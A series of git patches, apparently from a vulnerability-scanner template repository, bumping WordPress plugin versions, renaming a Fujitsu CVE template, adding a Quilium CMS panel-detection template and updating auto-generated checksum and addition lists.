a/helpers/wordpress/plugins/ewww-image-optimizer.txt b/helpers/wordpress/plugins/ewww-image-optimizer.txt index 4b49d9bb63..468c41f93c 100644 --- a/helpers/wordpress/plugins/ewww-image-optimizer.txt +++ b/helpers/wordpress/plugins/ewww-image-optimizer.txt @@ -1 +1 @@ -7.2.0 \ No newline at end of file +7.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt index c811a9aec4..186bf70f05 100644 --- a/helpers/wordpress/plugins/seo-by-rank-math.txt +++ b/helpers/wordpress/plugins/seo-by-rank-math.txt @@ -1 +1 @@ -1.0.201 \ No newline at end of file +1.0.201.1 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 From e21a15bf6894413092edbade1ae3cf22f7004b53 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 8 Sep 2023 11:39:18 +0530 Subject: [PATCH 0215/1090] Update and rename CVE-2023-38433.yaml to CVE-2023-38433.yaml --- {network/cves => http/cve}/2023/CVE-2023-38433.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename {network/cves => http/cve}/2023/CVE-2023-38433.yaml (95%) diff --git a/network/cves/2023/CVE-2023-38433.yaml b/http/cve/2023/CVE-2023-38433.yaml similarity index 95% rename from network/cves/2023/CVE-2023-38433.yaml rename to http/cve/2023/CVE-2023-38433.yaml index 82a03dc7b6..37d1a7144a 100644 --- a/network/cves/2023/CVE-2023-38433.yaml +++ b/http/cve/2023/CVE-2023-38433.yaml @@ -1,7 +1,7 @@ id: CVE-2023-38433 info: - name: Fujitsu IP series Hardcoded Credentials + name: Fujitsu IP Series - Hardcoded Credentials author: AdnaneKhan severity: high description: | @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cwe-id: CWE-798 metadata: - max-req: 2 + max-req: 1 shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133' verified: true tags: cve,cve2023,fujitsu,ip-series From faa72150418f7c700c11856b04265bc5a1f325d3 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Fri, 8 Sep 2023 08:24:20 +0200 Subject: [PATCH 0216/1090] Add TPL --- http/exposed-panels/quilium-panel.yaml | 34 ++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/exposed-panels/quilium-panel.yaml diff --git a/http/exposed-panels/quilium-panel.yaml b/http/exposed-panels/quilium-panel.yaml new file mode 100644 index 0000000000..57b58f6537 --- /dev/null +++ b/http/exposed-panels/quilium-panel.yaml @@ -0,0 +1,34 @@ +id: quilium-panel + +info: + name: Quilium Panel - Detect + author: righettod + severity: info + description: | + Quilium CMS was detected. + reference: + - https://www.quilium.io/ + metadata: + max-request: 1 + verified: true + tags: panel,quilium,login,detect + +http: + - method: GET + path: + - '{{BaseURL}}/en/login' + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "contains(tolower(body), 'cms quilium')" + - "status_code==200" + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'CMS Quilium ([a-f0-9.]+)' \ No newline at end of file From 7b13c53f13177ceced025a480facb2d486aa3f4d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 8 Sep 2023 06:28:07 +0000 Subject: [PATCH 0217/1090] Auto Generated New Template Addition List [Fri Sep 8 06:28:07 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c4e4a57530..fd0eb11116 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cnvd/2021/CNVD-2021-32799.yaml +http/cve/2023/CVE-2023-38433.yaml http/cves/2016/CVE-2016-10108.yaml http/cves/2018/CVE-2018-15917.yaml http/cves/2018/CVE-2018-17153.yaml From 20d3f7ddda4bb0c773f59364f40e3d6946ba0067 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 8 Sep 2023 06:28:43 +0000 Subject: [PATCH 0218/1090] Auto Generated Templates Checksum [Fri Sep 8 06:28:43 UTC 2023] :robot: --- templates-checksum.txt | 427 +++++++++++++++++++++-------------------- 1 file changed, 214 insertions(+), 213 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 55e5e16492..0f2402042b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:c4cc92fde64428a2e1e877b68f77a574c44e3b78 TEMPLATES-STATS.md:67c1555dd476c5b59ee278a560384ea46af7ee57 TOP-10.md:fa6189d7c66fbd05133727e032d48a030274079b contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:2a090e44e2e954850ed11618c19e41a19b6988ea -cves.json-checksum.txt:4f43f17c7def002ef9dec7bac05ddb45a5e2f2c3 +cves.json:a255b183d8ee189e6f919c3e3fff343dcdcce38f +cves.json-checksum.txt:f361a47242f5b3696d068c53446bc7420179fe11 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c @@ -364,7 +364,7 @@ helpers/wordpress/plugins/ad-inserter.txt:38bc2a6cfb847a70c262d12fd6603606363254 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/admin-menu-editor.txt:4572917cbde34e4ba98ab9a65059efd81be6594b helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7df -helpers/wordpress/plugins/advanced-custom-fields.txt:358a36934535cdb0f43c2bd34f8032939c89dee3 +helpers/wordpress/plugins/advanced-custom-fields.txt:cffca9b2145cbe8b44269c74219f807eace99c3e helpers/wordpress/plugins/akismet.txt:4380b93c5f9e9e252ac9ac548449d65f955603c4 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f helpers/wordpress/plugins/all-in-one-seo-pack.txt:bf1d607adfeedd476ba3e3fba79a756e25035222 @@ -388,7 +388,7 @@ helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09 helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:a81ab9d3802932cf95bd34d57f3554c73559eeae helpers/wordpress/plugins/cloudflare.txt:95b4f085ec6b3a33a23781c7cfda78c317e5dca1 helpers/wordpress/plugins/cmb2.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62 -helpers/wordpress/plugins/coblocks.txt:049a35ad82b9c914dc50f602563d1e37e06ef9a6 +helpers/wordpress/plugins/coblocks.txt:67de27fd6cf8d4bc1ad0b22499ec7f87a1acf6c4 helpers/wordpress/plugins/code-snippets.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5 helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/complianz-gdpr.txt:b12395a5190cbd66359bb94c3f32f0635e3c1544 @@ -416,8 +416,8 @@ helpers/wordpress/plugins/elementor.txt:ce20893b5464bf83cbb5cf7c0ec4e9b5affd8fa5 helpers/wordpress/plugins/elementskit-lite.txt:40d69a31b1f9d238ca1c38a357e6846c514e2e9f helpers/wordpress/plugins/enable-media-replace.txt:36442478f1f952d62cb89e1b634d5937a7d2863f helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6 -helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:a8b5e8e7888f955067310ada3053ab19bf9e01f9 -helpers/wordpress/plugins/ewww-image-optimizer.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b +helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:bd82642fcdbb4b8deecdafa23ae0de55f979eb2e +helpers/wordpress/plugins/ewww-image-optimizer.txt:f0e80e9d8b6e35e4d07b971ea614c40d8ec4efa3 helpers/wordpress/plugins/facebook-for-woocommerce.txt:98f2be81dca85d834586d9f281c4849476edffb2 helpers/wordpress/plugins/fast-indexing-api.txt:7fc90060ab7493dc709f0e0cbc6ae3ca7204a614 helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6 @@ -435,7 +435,7 @@ helpers/wordpress/plugins/google-listings-and-ads.txt:89941265e418c7729912b574c9 helpers/wordpress/plugins/google-site-kit.txt:2d61b8dd1d2334f5ff6b9c2010bf4078470db01d helpers/wordpress/plugins/google-sitemap-generator.txt:05a4815f734948e3bc0149a6d2d11169a1825f61 helpers/wordpress/plugins/gtranslate.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5 -helpers/wordpress/plugins/gutenberg.txt:c0efed1067cd93e221bc8de8ca57acf6011c6273 +helpers/wordpress/plugins/gutenberg.txt:b987da06f27582a0a441e2568c45f3e3f9f47618 helpers/wordpress/plugins/happy-elementor-addons.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:1653860f5bc7d2d43d6254c11488c4469d9db444 @@ -443,7 +443,7 @@ helpers/wordpress/plugins/header-footer-elementor.txt:a9510f9e42b212b735a604c279 helpers/wordpress/plugins/header-footer.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc helpers/wordpress/plugins/hello-dolly.txt:a9901643b6482a446e950927fd0e6f0e9fb01716 -helpers/wordpress/plugins/host-webfonts-local.txt:e8eea86ae4c46099848f3535a6610e2faf76f4c1 +helpers/wordpress/plugins/host-webfonts-local.txt:2d8d7a2994b4a941f25864496a40e7be21769689 helpers/wordpress/plugins/imagify.txt:d24fa45ca77f079cc359c97272276969e6aead2c helpers/wordpress/plugins/imsanity.txt:8833d6b9ff65739ec437d2754b9fc885e202a555 helpers/wordpress/plugins/insert-headers-and-footers.txt:32fecb37588747cdb8227230edc41ff2ca6557e1 @@ -475,7 +475,7 @@ helpers/wordpress/plugins/newsletter.txt:14665694dff2d37ef9323cf70015fe0466bea9b helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655 helpers/wordpress/plugins/nextgen-gallery.txt:f2cc8874a54d8d40b341d84839c1b2984efc0aba helpers/wordpress/plugins/ninja-forms.txt:2aee11d7a9ddfedc94e7fb36aefcf9174d34d88b -helpers/wordpress/plugins/ocean-extra.txt:248fa1629a5449451dde60521b10f8d16f52b23d +helpers/wordpress/plugins/ocean-extra.txt:595d550379b2cb8bccb9659627308ff4e751d23f helpers/wordpress/plugins/official-facebook-pixel.txt:ae0028333ce6fece2c0f57bd104815e938d80643 helpers/wordpress/plugins/one-click-demo-import.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 helpers/wordpress/plugins/optinmonster.txt:efeb47fd41d5443772275287ca2523cab8bc0139 @@ -499,7 +499,7 @@ helpers/wordpress/plugins/redirection.txt:392ee3765c26f4ca0b6935f9bb0f006c2354af helpers/wordpress/plugins/redux-framework.txt:1375dc6042d338e0d6b89174d9c404b7ebdae9cd helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 helpers/wordpress/plugins/safe-svg.txt:595d550379b2cb8bccb9659627308ff4e751d23f -helpers/wordpress/plugins/seo-by-rank-math.txt:26d3be19886d8968091c5568da94385ea2c3570f +helpers/wordpress/plugins/seo-by-rank-math.txt:a43557d2fb8277db824695f3e651c31ef604fac4 helpers/wordpress/plugins/sg-cachepress.txt:4b3ee513f62e0368db5c1409e926fc99b39d00c8 helpers/wordpress/plugins/sg-security.txt:6546e0bd1a292663f6166d3d6d903530b6db35c4 helpers/wordpress/plugins/shortcodes-ultimate.txt:c53ed3ab1a6689cbfb71149816b427f4cf870dc3 @@ -537,7 +537,7 @@ helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:381bb12da04a82580bb6 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:85e58fba8dcfa56b29939775178a4af11946316b -helpers/wordpress/plugins/woocommerce-payments.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6 +helpers/wordpress/plugins/woocommerce-payments.txt:f96eaecad7005b860741ecc59d4835f7428015fd helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/woocommerce-services.txt:17b06b2486a051055e43ae1127e87196d505e2f3 @@ -620,6 +620,7 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:02e294ce7b26d5732d8fc396fc http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:a5c13b905ce766747d75254fb82d122c8bbbe70d http/credential-stuffing/self-hosted/grafana-login-check.yaml:3a3891cc6d5dcf12b812bc128a41388883bccc48 http/credential-stuffing/self-hosted/jira-login-check.yaml:906c5a83678bc47a75c5aa5a32925b70d24b804e +http/cve/2023/CVE-2023-38433.yaml:22e156057279af80f55582b2c635f978284f7b91 http/cves/2000/CVE-2000-0114.yaml:fcd8e8015db69aaba7323d20ef4834bd34fd4346 http/cves/2001/CVE-2001-0537.yaml:f828a1bb3fb196d8fbc7c6cb30d44af702685156 http/cves/2002/CVE-2002-1131.yaml:12ad891bdc82a3f86d726abb8f60634c7ee66a98 @@ -5806,218 +5807,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e 